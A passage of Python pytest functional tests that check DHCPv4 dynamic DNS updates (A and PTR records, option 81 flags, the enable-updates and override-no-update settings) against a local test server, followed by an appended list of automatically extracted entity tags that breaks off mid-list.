    srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.reverse_add
def test_ddns4_notsig_rev_withoutflag_notenabled():
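    """DDNS updates are disabled and the client sets no flags; neither the PTR nor the A record is created."""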
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', False)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    # Response option 81 MUST contain flags 0; revisit later so that the 's', 'n' and 'o' bits yield 10.
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.reverse_add
def test_ddns4_notsig_rev_Nflag_override_no_update():
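    """Client sets the N (no update) flag, but 'override-no-update' forces the server to update anyway; option 81 returns flags 3 and both A and PTR records are created."""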
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('override-no-update', True)
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'N')
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 3)
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com.', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')
| 40,763 | [['DATE_TIME', 'test_ddns4_notsig_forw_and_rev_notenabled_Sflag'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', 
'192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.exae.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.exae.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 
'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.cl'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 
'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client2.four.example.com'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 
'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client2.four.example.com'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', 